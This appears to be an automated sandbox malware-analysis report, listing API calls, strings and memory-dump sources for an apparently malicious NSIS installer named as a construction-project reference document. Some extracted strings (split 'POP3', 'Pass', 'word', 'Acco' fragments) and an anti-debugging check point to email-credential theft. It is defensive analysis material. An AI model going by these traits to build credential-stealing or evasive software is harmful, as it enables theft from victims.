                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                          • String ID: $M$N
                                                                                                                          • API String ID: 1638840714-813528018

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • #17.COMCTL32 ref: 00403379
                                                                                                                          • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                                            • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 00406308
                                                                                                                            • Part of subcall function 004062F6: LoadLibraryA.KERNEL32(?,?,?,0040339D,00000009), ref: 00406313
                                                                                                                            • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                                          • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                                            • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                                          • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                                                                                          • CharNextW.USER32(00000000,00434000,?), ref: 00403403
                                                                                                                          • GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 0040353B
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                                                                                          • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                                                                                          • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040356C
                                                                                                                          • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                                                                                          • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                                                                                          • OleUninitialize.OLE32(?), ref: 0040366C
                                                                                                                          • ExitProcess.KERNEL32 ref: 0040368C
                                                                                                                          • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
                                                                                                                          • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                                                                                          • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                                                                                          • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                                                                                          • CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 00403725
                                                                                                                          • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000006,00000006,00000005,?), ref: 004037AC
                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403827
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                          • API String ID: 4107622049-1875889550
                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNEL32(?,?,00436800,74DF2EE0,00434000), ref: 0040583D
                                                                                                                          • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,74DF2EE0,00434000), ref: 00405885
                                                                                                                          • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,74DF2EE0,00434000), ref: 004058A8
                                                                                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,74DF2EE0,00434000), ref: 004058AE
                                                                                                                          • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,74DF2EE0,00434000), ref: 004058BE
                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040595E
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040596D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                          • String ID: \*.*
                                                                                                                          • API String ID: 2035342205-1173974218
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405B28,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,74DF2EE0,00405834,?,00436800,74DF2EE0), ref: 004062DA
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004062E6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID: 8WB
                                                                                                                          • API String ID: 2295610775-3088156181
                                                                                                                          APIs
                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 332B61DA
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 332B61E4
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 332B61F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3906539128-0
                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,332B4A8A,?,332C2238,?,332B4BBD,00000000,00000000,00000001,332B2082,332C2108,?,332B1F3A,?), ref: 332B4AD5
                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,332B4A8A,?,332C2238,?,332B4BBD,00000000,00000000,00000001,332B2082,332C2108,?,332B1F3A,?), ref: 332B4ADC
                                                                                                                          • ExitProcess.KERNEL32 ref: 332B4AEE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1703294689-0
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 54951025-0

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004053D1
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004053E0
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040541D
                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405424
                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405445
                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405456
                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405469
                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405477
                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040548A
                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004054AC
                                                                                                                          • ShowWindow.USER32(?,?), ref: 004054C0
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054E1
                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054F1
                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040550A
                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405516
                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004053EF
                                                                                                                            • Part of subcall function 004041CF: SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405533
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005307,00000000), ref: 00405541
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405548
                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040556C
                                                                                                                          • ShowWindow.USER32(?,?), ref: 00405571
                                                                                                                          • ShowWindow.USER32(?), ref: 004055BB
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055EF
                                                                                                                          • CreatePopupMenu.USER32 ref: 00405600
                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405614
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00405634
                                                                                                                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040564D
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405695
                                                                                                                          • EmptyClipboard.USER32 ref: 0040569B
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004056A7
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004056B1
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004056C5
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056E5
                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004056F0
                                                                                                                          • CloseClipboard.USER32 ref: 004056F6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                          • String ID: {$&B
                                                                                                                          • API String ID: 590372296-2518801558

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                                                                                          • ShowWindow.USER32(?), ref: 00403D1B
                                                                                                                          • DestroyWindow.USER32 ref: 00403D2F
                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F83
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F9E
                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403FD3
                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                                                                                          • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                                                                                          • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                          • String ID: &B
                                                                                                                          • API String ID: 184305955-3208460036

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 00406308
                                                                                                                            • Part of subcall function 004062F6: LoadLibraryA.KERNEL32(?,?,?,0040339D,00000009), ref: 00406313
                                                                                                                            • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                                          • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,74DF3420,00000000,00434000), ref: 004039A0
                                                                                                                          • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                                                                                          • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                                                                                          • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A87
                                                                                                                            • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                                          • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                                                                                          • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403ADC
                                                                                                                          • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                                                                                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                                                                                          • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                                                                          • API String ID: 914957316-1918744475

                                                                                                                          APIs
                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                                                                                          • GetSysColor.USER32(?), ref: 00404417
                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404438
                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                                                                                          • SendMessageW.USER32(00000000), ref: 004044BA
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                                                                                          • SetCursor.USER32(00000000), ref: 00404539
                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                                                                                          • SetCursor.USER32(00000000), ref: 0040455D
                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                                                                                          • SendMessageW.USER32(?,00000000,00000000), ref: 0040459E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                          • String ID: N$open

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 332B1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D1B
                                                                                                                            • Part of subcall function 332B1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,?,00000000,?,?,00000000), ref: 332B1D37
                                                                                                                            • Part of subcall function 332B1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D4B
                                                                                                                          • _strlen.LIBCMT ref: 332B1855
                                                                                                                          • _strlen.LIBCMT ref: 332B1869
                                                                                                                          • _strlen.LIBCMT ref: 332B188B
                                                                                                                          • _strlen.LIBCMT ref: 332B18AE
                                                                                                                          • _strlen.LIBCMT ref: 332B18C8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen$File$CopyCreateDelete
                                                                                                                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen
                                                                                                                          • String ID: %m$~$Gon~$~F@7$~dra

                                                                                                                          APIs
                                                                                                                          • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E4E,?,?,00000001,004059C6,?,00000000,000000F1,?), ref: 00405CBA
                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E4E,?,?,00000001,004059C6,?,00000000,000000F1,?), ref: 00405CDE
                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CE7
                                                                                                                            • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                                                                                            • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                                                                                          • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405D04
                                                                                                                          • wsprintfA.USER32 ref: 00405D22
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,?,00426588,?,?,?,?,?), ref: 00405D5D
                                                                                                                          • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405D6C
                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405DA4
                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DFA
                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405E0C
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405E13
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405E1A
                                                                                                                            • Part of subcall function 00405BF8: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BFC
                                                                                                                            • Part of subcall function 00405BF8: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                          APIs
                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                          • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                          • String ID: F
                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                                                                                          • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                                                                                          • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
